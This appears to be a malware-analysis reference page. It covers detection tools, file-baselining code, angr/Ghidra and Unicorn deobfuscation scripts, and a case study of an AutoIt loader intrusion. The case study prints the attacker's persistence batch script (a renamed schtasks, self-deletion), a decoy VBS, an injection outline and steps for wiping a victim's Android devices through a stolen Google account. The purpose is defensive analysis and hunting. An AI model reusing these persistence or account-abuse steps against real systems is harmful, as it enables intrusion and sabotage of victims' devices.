Malware Analysis


Forensics CheatSheets

https://www.jaiminton.com/cheatsheet/DFIR/#

Online Services

Offline Antivirus and Detection Tools

Yara

Install

```bash
sudo apt-get install -y yara
```

Prepare rules

Use this script to download and merge all the yara malware rules from GitHub: https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9
Create the rules directory and run the script. It creates a file called malware_rules.yar that contains all the yara rules for malware.

```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```

Scan

```bash
yara -w malware_rules.yar image  #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder
```

YaraGen: Check malware and generate rules

You can use the tool YaraGen to generate yara rules from a binary. Check out these tutorials: Part 1, Part 2, Part 3

```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m  ../../mals/
```

ClamAV

Install

```bash
sudo apt-get install -y clamav
```

Scan

```bash
sudo freshclam      #Update rules
clamscan filepath   #Scan 1 file
clamscan folderpath #Scan the whole folder
```

Capa

Capa detects potentially malicious capabilities in executables: PE, ELF, .NET. It will therefore find things like Att&ck tactics, or suspicious capabilities such as:

  • check for OutputDebugString error
  • run as a service
  • create process

Download it from the Github repo.

IOCs

IOC stands for Indicator Of Compromise. An IOC is a set of conditions that identifies some potentially unwanted software or confirmed malware. Blue Teams use this kind of definition to search for this kind of malicious file in their systems and networks.
Sharing these definitions is very useful because, once malware is identified on a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware much faster.

A tool to create or modify IOCs is IOC Editor.
You can use tools such as Redline to search for defined IOCs on a device.

Loki

Loki is a scanner for Simple Indicators of Compromise.
Detection is based on four detection methods:

1. File Name IOC
Regex match on full file path/name

2. Yara Rule Check
Yara signature matches on file data and process memory

3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files

4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)

Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, designed around the threats faced in shared hosting environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions through the LMD checkout feature and from malware community resources.

rkhunter

Tools like rkhunter can be used to check the filesystem for possible rootkits and malware.

```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```

FLOSS

FLOSS is a tool that tries to find obfuscated strings inside executables using different techniques.

PEpper

PEpper checks some basic things inside the executable (binary data, entropy, URLs and IPs, some yara rules).

PEstudio

PEstudio is a tool that allows you to obtain information about Windows executables such as imports, exports and headers, but it also checks VirusTotal and finds potential Att&ck techniques.

Detect It Easy(DiE)

DiE is a tool to detect whether a file is encrypted and also to find packers.

NeoPI

NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code.

php-malware-finder

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malware/webshells.

Apple Binary Signatures

When checking a malware sample you should always check the signature of the binary, since the developer who signed it may already be related to malware.

```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

#Check if the app's contents have been modified
codesign --verify --verbose /Applications/Safari.app

#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app
```

Detection Techniques

File Stacking

If you know that a folder containing the files of a web server was last updated on a certain date, check the creation and modification dates of all the files on the web server, and if any date looks suspicious, examine that file.

Baselines

If the files of a folder should not have been modified, you can compute the hash of the original files of the folder and compare them with the current ones. Anything that has been modified is suspicious.

Statistical Analysis

When information is saved in logs you can check statistics such as how many times each file of the web server was accessed, since a web shell may be one of the most accessed files.
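The three techniques above in code, as an added example that is not part of the original page: it baselines a constructed web root by SHA-256 and reports modified/added/missing files, lists files whose mtime is later than a known deployment time (file stacking), and counts request paths in a few constructed access-log lines (statistical analysis). The web root, timestamps and log lines are all constructed for the demo.

```python
import hashlib, os, re, tempfile
from collections import Counter
from pathlib import Path

def build_baseline(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare_baseline(baseline, root):
    """Baselines: anything modified, added or missing since the baseline is suspect."""
    current = build_baseline(root)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "missing": sorted(f for f in baseline if f not in current),
    }

def modified_after(root, cutoff_epoch):
    """File stacking: files whose mtime is later than the last legitimate deployment."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob("*")
                  if p.is_file() and p.stat().st_mtime > cutoff_epoch)

# Apache/nginx combined-log style; captures the request path without the query string.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE)\s+([^\s?]+)')

def request_counts(log_lines):
    """Statistical analysis: requests per path (a web shell often ranks near the top)."""
    return Counter(m.group(1) for line in log_lines if (m := LOG_RE.search(line)))

# Constructed sample access log (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /lib/db.php HTTP/1.1" 200 40
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "POST /images/cache.php?c=1 HTTP/1.1" 200 88
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "POST /images/cache.php?c=2 HTTP/1.1" 200 91
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "POST /images/cache.php HTTP/1.1" 200 77
""".splitlines()

def demo():
    """Baseline a constructed web root, then simulate one tampered file and one dropped file."""
    deploy_time = 1_700_000_000  # constructed: epoch of the last legitimate deployment
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "lib").mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        (root / "lib" / "db.php").write_text("<?php // db helper ?>")
        for p in root.rglob("*"):
            if p.is_file():
                os.utime(p, (deploy_time, deploy_time))   # backdate legitimate files
        baseline = build_baseline(root)
        # Changes made now (long after deploy_time): one tampered file, one new file
        (root / "lib" / "db.php").write_text("<?php // db helper (tampered) ?>")
        (root / "images").mkdir()
        (root / "images" / "cache.php").write_text("<?php // dropped file ?>")
        diff = compare_baseline(baseline, root)
        recent = modified_after(root, deploy_time + 1)
    return diff, recent, request_counts(SAMPLE_LOG)

if __name__ == "__main__":
    print(demo())
```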


Android in-app native telemetry (no root)

On Android, you can instrument native code inside the target app's process by preloading a small logger library before the other JNI libraries are initialised. This gives early visibility into native behaviour without system-wide hooks or root. A popular approach is SoTap: place libsotap.so for the correct ABI inside the APK and inject a System.loadLibrary("sotap") call early (e.g., in a static initializer or Application.onCreate), then collect the logs from internal/external paths or use Logcat as a fallback.

See the Android native reversing page for setup details and log paths:

Reversing Native Libraries


Android/JNI native string deobfuscation with angr + Ghidra

Some Android malware and RASP-protected apps hide JNI method names and signatures by decoding them at runtime just before calling RegisterNatives. When Frida/ptrace instrumentation is killed by anti-debug, you can still recover the plaintext offline by running the decoder contained in the binary with angr and then pushing the results into Ghidra as comments.

Key idea: treat the decoder inside the .so as a callable function, execute it on the obfuscated byte blobs in .rodata, and concretize the output bytes up to the first \x00 (C-string terminator). Make sure angr and Ghidra use the same image base to avoid address mismatches.

Workflow overview

  • Triage in Ghidra: identify the decoder and its calling convention/arguments in JNI_OnLoad and the RegisterNatives setup.
  • Run angr (CPython3) to execute the decoder for every target string and dump the results.
  • Annotate in Ghidra: auto-comment the decoded strings at each call site for fast JNI reversing.

Ghidra triage (JNI_OnLoad pattern)

  • Apply JNI datatypes to JNI_OnLoad so Ghidra recognises JNINativeMethod structures.
  • Typical JNINativeMethod per Oracle docs:

```c
typedef struct {
    char *name;      // e.g., "nativeFoo"
    char *signature; // e.g., "()V", "()[B"
    void *fnPtr;     // native implementation address
} JNINativeMethod;
```

  • Look for calls to RegisterNatives. If the library constructs the name/signature with a local routine (e.g., FUN_00100e10) that references a static byte table (e.g., DAT_00100bf4) and takes parameters like (encoded_ptr, out_buf, length), that is an ideal target for offline execution.

angr setup (execute the decoder offline)

  • Load the .so with the same base used in Ghidra (example: 0x00100000) and disable auto-loading of external libs to keep the state small.
<details>
<summary>angr setup and offline decoder execution</summary>

```python
import angr, json

project = angr.Project(
    '/path/to/libtarget.so',
    load_options={'main_opts': {'base_addr': 0x00100000}},
    auto_load_libs=False,
)

ENCODING_FUNC_ADDR = 0x00100e10  # decoder function discovered in Ghidra

def decode_string(enc_addr, length):
    # fresh blank state per evaluation
    st = project.factory.blank_state()
    outbuf = st.heap.allocate(length)
    call = project.factory.callable(ENCODING_FUNC_ADDR, base_state=st)
    ret_ptr = call(enc_addr, outbuf, length)  # returns outbuf pointer
    rs = call.result_state
    raw = rs.solver.eval(rs.memory.load(ret_ptr, length), cast_to=bytes)
    return raw.split(b'\x00', 1)[0].decode('utf-8', errors='ignore')

# Example: decode a JNI signature at 0x100933 of length 5 -> should be ()[B
print(decode_string(0x00100933, 5))
```

</details>

- At scale, build a static map of call sites to the decoder's arguments (encoded_ptr, size). Wrappers can hide the arguments, so you may need to build this mapping by hand from Ghidra xrefs if automatic argument recovery is noisy.

<details>
<summary>Batch decode many call sites with angr</summary>

```python
# call_site -> (encoded_addr, size)
call_site_args_map = {
    0x00100f8c: (0x00100b81, 0x41),
    0x00100fa8: (0x00100bca, 0x04),
    0x00100fcc: (0x001007a0, 0x41),
    0x00100fe8: (0x00100933, 0x05),
    0x0010100c: (0x00100c62, 0x41),
    0x00101028: (0x00100c15, 0x16),
    0x00101050: (0x00100a49, 0x101),
    0x00100cf4: (0x00100821, 0x11),
    0x00101170: (0x00100940, 0x101),
    0x001011cc: (0x0010084e, 0x13),
    0x00101334: (0x001007e9, 0x0f),
    0x00101478: (0x0010087d, 0x15),
    0x001014f8: (0x00100800, 0x19),
    0x001015e8: (0x001008e6, 0x27),
    0x0010160c: (0x00100c33, 0x13),
}

decoded_map = {hex(cs): decode_string(enc, sz)
               for cs, (enc, sz) in call_site_args_map.items()}

import json
print(json.dumps(decoded_map, indent=2))
with open('decoded_strings.json', 'w') as f:
    json.dump(decoded_map, f, indent=2)
```

</details>

Annotate call sites in Ghidra

Option A: Jython-only comment writer (use a pre-computed JSON)

  • Because angr needs CPython3, keep deobfuscation and annotation as separate steps. First run the angr script above to produce decoded_strings.json. Then run this Jython GhidraScript to write PRE_COMMENTs at every call site (including the caller function name for context):

<details>
<summary>Ghidra Jython script to annotate decoded JNI strings</summary>

```python
#@category Android/Deobfuscation
# Jython in Ghidra 10/11
import json
from ghidra.program.model.listing import CodeUnit

# Ask for the JSON produced by the angr script
f = askFile('Select decoded_strings.json', 'Load')
mapping = json.load(open(f.absolutePath, 'r'))  # keys as hex strings

fm = currentProgram.getFunctionManager()
rm = currentProgram.getReferenceManager()

# Replace with your decoder address to locate call-xrefs (optional)
ENCODING_FUNC_ADDR = 0x00100e10
enc_addr = toAddr(ENCODING_FUNC_ADDR)

callsite_to_fn = {}
for ref in rm.getReferencesTo(enc_addr):
    if ref.getReferenceType().isCall():
        from_addr = ref.getFromAddress()
        fn = fm.getFunctionContaining(from_addr)
        if fn:
            callsite_to_fn[from_addr.getOffset()] = fn.getName()

# Write comments from JSON
for k_hex, s in mapping.items():
    cs = int(k_hex, 16)
    site = toAddr(cs)
    caller = callsite_to_fn.get(cs, None)
    text = s if caller is None else '%s @ %s' % (s, caller)
    currentProgram.getListing().setComment(site, CodeUnit.PRE_COMMENT, text)
print('[+] Annotated %d call sites' % len(mapping))
```

</details>

Option B: single CPython script via pyhidra/ghidra_bridge
- Alternatively, use pyhidra or ghidra_bridge to drive the Ghidra API from the same CPython process that runs angr. This lets you call decode_string() and set PRE_COMMENTs immediately, without an intermediate file. The logic mirrors the Jython script: build the callsite→function map with the ReferenceManager, decode with angr, and set the comments.

Why this works and when to use it
- Offline execution sidesteps RASP/anti-debug: no ptrace and no Frida hooks are needed to recover the strings.
- Keeping the Ghidra and angr base_addr aligned (e.g., 0x00100000) ensures function/data addresses match across both tools.
- A repeatable recipe for decoders: treat the transform as a pure function, allocate an output buffer in a fresh state, call it with (encoded_ptr, out_ptr, len), then concretize via state.solver.eval and parse the C-string up to \x00.

Caveats and limitations
- Respect the target ABI/calling convention. angr.factory.callable picks one based on the arch; if arguments appear shifted, specify the cc explicitly.
- If the decoder expects zero-initialised output buffers, initialise outbuf to zeros in the state before the call.
- For Android .so files that are not position-dependent, always supply base_addr so that addresses in angr match those seen in Ghidra.
- Use currentProgram.getReferenceManager() to enumerate call-xrefs even when the app hides the decoder behind thin stubs.

For angr basics, see: [angr basics](../../reversing/reversing-tools-basic-methods/angr/README.md)

---

## Kuondoa ufichaji wa Dynamic Control-Flow (JMP/CALL RAX Dispatchers)

Modern malware families abuse Control-Flow Graph (CFG) obfuscation: instead of a direct jump/call they compute the destination at runtime and then execute `jmp rax` or `call rax`. A small *dispatcher* (typically nine instructions) sets the final target depending on the CPU `ZF`/`CF` flags, completely breaking static CFG recovery.

The technique, showcased by the SLOW#TEMPEST loader, can be defeated with a three-step workflow that relies only on IDAPython and the Unicorn CPU emulator.

### 1. Identify every indirect jump / call
```python
import idautils, idc

for ea in idautils.FunctionItems(idc.here()):
    mnem = idc.print_insn_mnem(ea)
    if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
        print(f"[+] Dispatcher found @ {ea:X}")
```

### 2. Extract the dispatcher byte-code

```python
import idc

def get_dispatcher_start(jmp_ea, count=9):
    s = jmp_ea
    for _ in range(count):
        s = idc.prev_head(s, 0)
    return s

start = get_dispatcher_start(jmp_ea)   # jmp_ea: address of the jmp/call rax found in step 1
size  = jmp_ea + idc.get_item_size(jmp_ea) - start
code  = idc.get_bytes(start, size)
open(f"{start:X}.bin", "wb").write(code)
```

### 3. Emulate it twice with Unicorn

```python
from unicorn import *
from unicorn.x86_const import *

def run(code, zf=0, cf=0):
    BASE = 0x1000
    mu = Uc(UC_ARCH_X86, UC_MODE_64)
    mu.mem_map(BASE, 0x1000)
    mu.mem_write(BASE, code)
    mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)   # ZF is bit 6, CF is bit 0
    mu.reg_write(UC_X86_REG_RAX, 0)
    mu.emu_start(BASE, BASE + len(code))
    return mu.reg_read(UC_X86_REG_RAX)
```

Run run(code, 0, 0) and run(code, 1, 1) to obtain the false and true branch targets.

### 4. Patch back a direct jump / call

```python
import struct, ida_bytes

def patch_direct(ea, target, is_call=False):
    op   = 0xE8 if is_call else 0xE9            # CALL rel32 or JMP rel32
    disp = (target - (ea + 5)) & 0xFFFFFFFF     # rel32 is relative to the end of the 5-byte instruction
    ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))
```

After patching, force IDA to re-analyse the function so that the full CFG and Hex-Rays output are restored:

```python
import ida_auto, idaapi
idaapi.reanalyze_function(idc.get_func_attr(ea, idc.FUNCATTR_START))
```

### 5. Label indirect API calls

Once the real target of every call rax is known, you can tell IDA what it is so that parameter types and variable names are recovered automatically:

```python
idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+
```

### Practical benefits

  • Restores the real CFG → decompilation goes from 10 lines to thousands.
  • Enables string cross-references and xrefs, making behaviour reconstruction trivial.
  • The scripts are reusable: drop them into any loader protected by the same trick.

AutoIt-based loaders: .a3x decryption, Task Scheduler masquerade and RAT injection

This intrusion chain combines a signed MSI, AutoIt loaders compiled to .a3x, and a Task Scheduler job masquerading as a benign app.

MSI → custom actions → AutoIt orchestrator

Process tree and commands executed by the MSI custom actions:

  • MsiExec.exe → cmd.exe running install.bat
  • WScript.exe showing a decoy error dialog

```bat
%SystemRoot%\system32\cmd.exe /c %APPDATA%\스트레스 클리어\install.bat
%SystemRoot%\System32\WScript.exe %APPDATA%\스트레스 클리어\error.vbs
```

install.bat (drops the loader, sets up persistence, cleans up after itself):

```bat
@echo off
set dr=Music

copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe
copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3

cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe ^
& hwpviewer /delete /tn "IoKlTr" /f ^
& hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3"

del /f /q "%~dp0AutoIt3.exe"
del /f /q "%~dp0IoKlTr.au3"
del /f /q "%~f0"
```

error.vbs (user decoy):

```vbs
MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _
"설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _
vbCritical, "언어팩 오류"
```

Key artifacts and masquerading tricks:

  • Drops AutoIt3.exe and IoKlTr.au3 into C:\Users\Public\Music
  • Copies schtasks.exe as hwpviewer.exe (impersonating the Hangul Word Processor viewer)
  • Creates the scheduled task "IoKlTr", which runs every 1 minute
  • Startup LNK masquerading as Smart_Web.lnk; mutex: Global\AB732E15-D8DD-87A1-7464-CE6698819E701
  • Drops modules under %APPDATA%\Google\Browser\ subfolders containing adb or adv and launches them through autoit.vbs/install.bat helpers

Forensic triage notes:

  • schtasks enumeration: schtasks /query /fo LIST /v | findstr /i "IoKlTr hwpviewer"
  • Look for renamed copies of schtasks.exe next to the Task XML: dir /a "C:\Users\Public\Music\hwpviewer.exe"
  • Typical paths: C:\Users\Public\Music\AutoIt3.exe, ...\IoKlTr.au3, Startup Smart_Web.lnk, %APPDATA%\Google\Browser\(adb|adv)*
  • Correlate process creation: AutoIt3.exe spawning legitimate Windows binaries (e.g., cleanmgr.exe, hncfinder.exe)

AutoIt loaders and .a3x payload decryption → injection

  • The AutoIt modules are compiled with #AutoIt3Wrapper_Outfile_type=a3x and decrypt embedded payloads before injecting them into benign processes.
  • Families observed: QuasarRAT (injected into hncfinder.exe) and RftRAT/RFTServer (injected into cleanmgr.exe), plus RemcosRAT modules (Remcos\RunBinary.a3x).
  • Decryption pattern: derive the AES key via HMAC, decrypt the embedded blob, then inject the plaintext module.

Generic decryption skeleton (exact HMAC input/algorithm is family-specific):

```python
import hmac, hashlib
from Crypto.Cipher import AES

def derive_aes_key(secret: bytes, data: bytes) -> bytes:
    # Example: HMAC-SHA256 -> first 16/32 bytes as AES key
    return hmac.new(secret, data, hashlib.sha256).digest()

def aes_decrypt_cbc(key: bytes, iv: bytes, ct: bytes) -> bytes:
    return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(ct)
```

Typical injection flow (CreateRemoteThread-style):

  • CreateProcess (suspended) of the target host (e.g., cleanmgr.exe)
  • VirtualAllocEx + WriteProcessMemory with the decrypted module/shellcode
  • CreateRemoteThread or QueueUserAPC to execute the payload

Hunting ideas

  • AutoIt3.exe with parent MsiExec.exe or WScript.exe spawning system utilities
  • Files with the .a3x extension or AutoIt script runners in public/user-writable paths
  • Suspicious scheduled tasks launching AutoIt3.exe or non-Microsoft-signed binaries with minute-level triggers
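The hunting ideas above turned into checks, as an added example that is not part of the original page or of any vendor tooling: it parses `schtasks /query /fo LIST /v` style output and flags tasks that launch AutoIt3.exe from a user-writable path on a minute-level repeat, and it flags parent/child process pairs where an installer or script host spawns AutoIt3.exe, or AutoIt3.exe spawns a System32 binary. The task listing, paths and process events are constructed samples modelled on the artifacts described above.

```python
import re

# Constructed excerpt of `schtasks /query /fo LIST /v` output (not real telemetry).
SCHTASKS_OUTPUT = """\
TaskName:                             \\IoKlTr
Task To Run:                          C:\\Users\\Public\\Music\\AutoIt3.exe C:\\Users\\Public\\Music\\IoKlTr.au3
Schedule Type:                        One Time Only, Minute
Repeat: Every:                        0 Hour(s), 1 Minute(s)

TaskName:                             \\Microsoft\\Windows\\Defrag\\ScheduledDefrag
Task To Run:                          %windir%\\system32\\defrag.exe -c -h -g -#
Schedule Type:                        Weekly
Repeat: Every:                        Disabled
"""

# Constructed process-creation events as (parent image, child image) pairs.
PROCESS_EVENTS = [
    (r"C:\Windows\System32\wscript.exe", r"C:\Users\Public\Music\AutoIt3.exe"),
    (r"C:\Users\Public\Music\AutoIt3.exe", r"C:\Windows\System32\cleanmgr.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe"),
]

WRITABLE_PREFIXES = ("c:\\users\\public\\", "%appdata%\\", "%temp%\\", "c:\\programdata\\")
INSTALLER_HOSTS = {"msiexec.exe", "wscript.exe"}

def parse_schtasks(text):
    """One dict per task; schtasks pads each field with 2+ spaces after the colon."""
    blocks = re.split(r"\n\s*\n", text.strip())
    return [dict(re.findall(r"^(.+?):\s{2,}(.*)$", b, re.M)) for b in blocks]

def minute_level(repeat):
    """True for 'N Hour(s), M Minute(s)' repeats with zero hours and M > 0."""
    m = re.search(r"(\d+) Hour\(s\), (\d+) Minute\(s\)", repeat or "")
    return bool(m) and int(m.group(1)) == 0 and int(m.group(2)) > 0

def suspicious_tasks(text):
    """Flag tasks that launch AutoIt3.exe, run from writable paths, or repeat every few minutes."""
    hits = []
    for t in parse_schtasks(text):
        cmd = t.get("Task To Run", "").lower()
        reasons = [why for ok, why in (
            ("autoit3.exe" in cmd, "runs AutoIt3.exe"),
            (cmd.startswith(WRITABLE_PREFIXES), "binary in user-writable path"),
            (minute_level(t.get("Repeat: Every")), "minute-level repeat")) if ok]
        if reasons:
            hits.append((t.get("TaskName"), reasons))
    return hits

def suspicious_chains(events):
    """Flag installer/script hosts spawning AutoIt3.exe, and AutoIt3.exe spawning System32 binaries."""
    hits = []
    for parent, child in events:
        p, c = parent.lower().rsplit("\\", 1)[-1], child.lower().rsplit("\\", 1)[-1]
        if p in INSTALLER_HOSTS and c == "autoit3.exe":
            hits.append(f"{p} -> {c}")
        elif p == "autoit3.exe" and "\\windows\\system32\\" in child.lower():
            hits.append(f"{p} -> {c} (AutoIt spawning a system binary)")
    return hits

if __name__ == "__main__":
    print(suspicious_tasks(SCHTASKS_OUTPUT))
    print(suspicious_chains(PROCESS_EVENTS))
```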

Android Find My Device (Find Hub) account-takeover abuse

During the Windows intrusion, the operators used stolen Google credentials to repeatedly wipe the victim's Android devices, suppressing notifications while they extended their access through a desktop messenger that was still logged in as the victim.

Operator steps (from a logged-in browser session):

  • Check Google Account → Security → Your devices; follow Find My Phone → Find Hub (https://www.google.com/android/find)
  • Select the device → re-enter the Google password → issue "Erase device" (factory reset); repeat to delay recovery
  • Optional: delete the alert e-mails in the linked mailbox (e.g., Naver) to hide the security notifications

AdaptixC2: Config Extraction and TTPs

See the dedicated page:

Adaptixc2 Config Extraction And Ttps
